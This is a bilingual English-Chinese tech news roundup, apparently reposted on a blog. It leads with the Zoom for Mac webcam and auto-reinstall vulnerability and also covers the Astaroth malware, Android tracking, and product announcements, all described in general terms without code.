exploit-db:
The Zoom video conferencing app for Mac has serious flaws left unaddressed despite disclosures. When visiting a malicious website, bad actors can activate your camera without permission. If you uninstalled Zoom, the malicious site can reinstall without your interaction.
尽管有披露,但适用于Mac的Zoom视频会议应用程序存在严重缺陷,但仍未解决。 当访问恶意网站时,不良行为者可能会未经许可激活您的相机。 如果您卸载了Zoom,则恶意站点可以在没有您交互的情况下重新安装。
Security researcher Jonathan Leitschuh noticed that Zoom has the capability to auto-join and start a video session just by visiting a link. He wondered how the company securely accomplished the feat and investigated. He quickly found out that that Zoom’s methods weren’t secure at all.
安全研究员Jonathan Leitschuh注意到Zoom只需访问链接即可自动加入并启动视频会话。 他想知道公司如何安全完成这项壮举并进行调查。 他很快发现Zoom的方法根本不安全。
When you install Zoom on a Mac, it creates a web server on your machine. The web server is problematic on multiple levels. With just a few options, Leitschuh put together a proof of concept website. If you have Zoom installed and visit that website, you will be auto-joined to a call, and your webcam activated without any interaction on your part—even if you closed Zoom before clicking the link.
在Mac上安装Zoom时,它将在您的计算机上创建一个Web服务器。 Web服务器在多个级别上都有问题。 仅有几个选择,Leitschuh组成了概念证明网站。 如果您安装了Zoom并访问了该网站,您将自动加入通话,并且网络摄像头将被激活而不会发生任何交互-即使在单击链接之前关闭了Zoom。
Worse yet, uninstalling Zoom doesn’t remove the web server. The web server can reinstall Zoom on its own as well. So if you visit a malicious link, it can reinstall Zoom, join you to a call, and start your webcam, all without any interaction from you.
更糟糕的是,卸载Zoom不会删除Web服务器。 Web服务器也可以自行重新安装Zoom。 因此,如果您访问了恶意链接,它可以重新安装Zoom,将您加入通话和启动网络摄像头,而无需您进行任何交互。
You can test this at Leitschuh’s proof of concept, but be advised if you have Zoom installed your camera will start, and you’ll find yourself joined to a call with other people testing the site. Leitschuh notified Zoom of his findings along with a 90-day disclosure grace period. Unfortunately, the company didn’t do much to fix the problem.
您可以在Leitschuh的概念验证中对此进行测试,但会被告知是否安装了Zoom,这将启动相机,并且您会发现自己加入了与测试该网站的其他人的通话。 莱茨丘(Leitschuh)将其调查结果以及90天的披露宽限期通知了Zoom。 不幸的是,该公司没有为解决该问题做很多事情。
Initially, the company brushed the whole thing off as part of the features it supports. Zoom eventually implemented a mild fix that prevents the camera from turning on, but malicious actors can still force users to join a call and reinstall Zoom. [Medium]
最初,该公司将整个过程作为其支持的功能的一部分。 Zoom最终实施了一个温和的修复程序,以防止相机开机,但是恶意行为者仍然可以迫使用户加入通话并重新安装Zoom。 [中]
在其他新闻中: (In Other News:)
Microsoft is sneaking ads into Android: If you have a Microsoft Android app installed, you might see ads for other Microsoft apps. But not inside the app itself. Microsoft is inserting suggestions in Android’s share and open menus. If you share a photo with a friend, you might see OneDrive listed, even if you didn’t install it. Tapping OneDrive takes you the Play Store. Subtle yet gross. [Android Police]
微软正在将广告潜入Android:如果您安装了Microsoft Android应用,则可能会看到其他Microsoft应用的广告。 但不在应用程序内部。 微软正在Android的共享和打开菜单中插入建议。 如果您与朋友共享照片,即使未安装,也可能会列出OneDrive。 轻按OneDrive可带您进入Play商店。 微妙而又粗糙。 [ Android警察]
Apple announced a new MacBook Lineup: Apple is shaking things up in the MacBook world: gone are the MacBook model and the non-Touchbar MacBook Pro models. But as they leave, a less expensive MacBook Air with an improved screen takes center stage. We think this is the most sensible lineup in years. We also believe you should wait on buying a MacBook anyway, because of the ongoing keyboard issues. [ReviewGeek]
苹果宣布了新的MacBook产品阵容:苹果正在改变MacBook世界:不再是MacBook型号和非Touchbar MacBook Pro型号。 但是随着他们的离开,价格便宜,屏幕改进的MacBook Air成为了焦点。 我们认为这是多年来最明智的阵容。 我们还认为,由于键盘问题持续存在,您还是应该等待购买MacBook。 [ ReviewGeek ]
Microsoft issued a warning about hard-to-detect malware: Microsoft discovered a malware campaign, dubbed Astaroth, using incredibly advanced techniques to evade discovery. Astaroth relies on system tools, like the Windows Management Instrumentation Command-line (WMIC) tool, to do all its work to masquerade as system activity (a Living in the Land technique). And it never saves files, instead executing entirely in memory (a fileless method). Astaroth is delivered through spam email with malicious links so be careful what you click. [ZDNet]
微软发出了关于难以检测到的恶意软件的警告:微软发现了一个名为Astaroth的恶意软件活动,它使用难以置信的先进技术来逃避发现。 Astaroth依靠Windows Management Instrumentation命令行(WMIC)工具之类的系统工具来完成其所有工作,以作为系统活动来伪装(一种“活在土地上”的技术)。 而且它从不保存文件,而是完全在内存中执行(无文件方法)。 Astaroth是通过带有恶意链接的垃圾邮件发送的,因此请小心单击。 [ ZDNet ]
Over 1000 Android apps ignore your permissions choices, track you anyway: Security researchers discovered that many Android apps would track you even if you chose permissions options to prevent it. Most use alternative options; for instance, Shutterfly pulls GPS information from your photo metadata. Some even share data from one app to another. Android Q should solve the problem, but Android isn’t known for timely updates. [9to5Google]
超过1000个Android应用程序会忽略您的权限选择,无论如何都会跟踪您:安全研究人员发现,即使您选择了权限选项来阻止您,许多Android应用程序也会跟踪您。 大多数使用替代选项; 例如,Shutterfly从您的照片元数据中提取GPS信息。 有些甚至将数据从一个应用程序共享到另一个应用程序。 Android Q应该可以解决该问题,但是不知道Android是否及时更新。 [ 9to5Google ]
Instagram wants to stop bullying: Instagram is testing new features designed to curtail bullying on its platform. The first is an A.I. process that detects when you are writing something disparaging and questions if you truly want to post the comment. The second will let users shadow ban commenters. A shadowban hides comments from everyone except the poster without notifying them. [Instagram]
Instagram希望停止欺凌: Instagram正在测试旨在减少其平台上欺凌行为的新功能。 第一个是AI流程,它可以检测您何时撰写贬义的内容以及是否确实要发表评论的问题。 第二个将使用户遮盖禁令评论者。 阴影遮挡隐藏了除海报以外的所有评论,而没有通知他们。 [ Instagram ]
Spotify Lite is smaller, with fewer features: Spotify’s new Lite app for Android is a svelte 10MB in size, which is great for devices with limited storage and countries with slower internet speeds. Of course, the smaller size means fewer features. But you still get the most important part, music, which is really all that matters. While it’s available now in 36 markets around the world, the US isn’t one of them. [Engadget]
Spotify Lite较小,功能较少: Spotify的Android新Lite应用程序只有10MB的大小,非常适合存储空间有限的设备和互联网速度较慢的国家/地区。 当然,较小的尺寸意味着较少的功能。 但是,您仍然会获得最重要的部分,音乐,这才是最重要的。 虽然它现已在全球36个市场中提供,但美国并不是其中之一。 [ Engadget ]
Google says you get to keep your Stadia Games: Google Stadia is incredibly intriguing. But one question (ok many questions) loomed heavily: what happens if a game publisher stops supporting Stadia? Do you lose the game despite the money you spent? Google updated its FAQ, and it promises you’ll keep your games in that event “barring unforeseen circumstances” (because every company wants wiggle room). [The Verge]
Google说,您必须保留自己的Stadia游戏: Google Stadia非常令人着迷。 但是一个问题(很多问题)迫在眉睫:如果游戏发行商停止支持Stadia,会发生什么? 尽管您花了钱,但您是否输掉了比赛? Google更新了其常见问题解答,并承诺您将在“除非有意外情况”的情况下保留您的游戏(因为每个公司都希望有回旋余地)。 [边缘]
Microsoft’s weird tweets were just a Stranger Things ad: Microsoft’s tweets have been “strange” lately, touting Windows 1.0 and other throwbacks. The references to 1985 made it a likely Stranger Things tie-in (a show set in 1985), and now that’s confirmed with a theme pack and Windows 1.11 app download. If you like things ugly, and really love Paint, download them now. [Ars Technica]
微软的怪异推文只是一个陌生事物广告:微软的推文最近一直“奇怪”,吹捧Windows 1.0和其他缺点。 对1985的引用使它很可能是Stranger Things的搭配对象(1985年的一个展览),现在通过主题包和Windows 1.11应用程序下载得到了证实。 如果您喜欢丑陋的东西,并且真的喜欢Paint,请立即下载。 [ Ars Technica ]
YouTube returns to FireTV and Prime Video gets Chromecast support: Google removed YouTube from FireTV as the two companies fought about representation in each other’s stores. The companies promised peace, and it seems that’s finally coming to pass. You’ll now find YouTube on most FireTV devices (save for the Echo Show). Also starting today, Prime Video will get Chromecast support. What a time to be alive. [GeekWire]
YouTube回归FireTV,Prime Video获得了Chromecast支持:由于两家公司都在争夺彼此商店的代表权,因此Google从FireTV中删除了YouTube。 两家公司承诺和平,而且看来终于要实现了。 现在,您将在大多数FireTV设备上找到YouTube(保存为Echo Show)。 从今天开始,Prime Video将获得Chromecast支持。 多么活着的时间。 [ GeekWire ]
Touchscreens, with their virtual buttons that reconfigure based on your needs, are a fantastic technology that transformed the way we live. That is unless you are blind. Touchscreens are an obtuse technology for anyone without sight to use—the buttons lack tactile sensation, which is necessary to find them and determine their use.
触摸屏及其虚拟按钮可根据您的需求进行重新配置,是一种神奇的技术,它改变了我们的生活方式。 那是除非你是盲人。 对于没有视力的人来说,触摸屏是一种钝器技术,因为按钮缺乏触觉,这对于找到它们并确定其用途是必不可少的。
Researches want to solve that and other problems. They’re working on electronic skin which could interact with touchscreens to provide tactile sensations. Think of it like your cell phone vibrations, but on a smaller scale that gives you a sense of which direction to move your finger, or how hard to push.
研究希望解决该问题和其他问题。 他们正在研究可以与触摸屏互动以提供触感的电子皮肤。 可以将其像手机振动一样,但是在较小的范围内可以使您感觉到手指移动的方向或推动的难度。
The idea is to keep the tech thin enough you can feel through it with your finger, yet to still embed circuits that can interact with other technology and you. Scientists hope that one-day electronic skin could add the feeling of sensation and touch to a prosthetic hand as well. There’s still a long way to go before this happens, but now it truly seems possible and not just something in the realm of science fiction. That’s true progress. [Phys.org]
这个想法是要使技术保持足够薄,以使您可以用手指感觉到它,但仍要嵌入可以与其他技术和您交互的电路。 科学家希望,一天的电子皮肤也可以为假手增加感觉和触觉。 在此之前,还有很长的路要走,但现在看来确实是有可能的,而不仅仅是科幻小说领域中的某些事情。 那是真正的进步。 [ Phys.org ]
exploit-db:
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
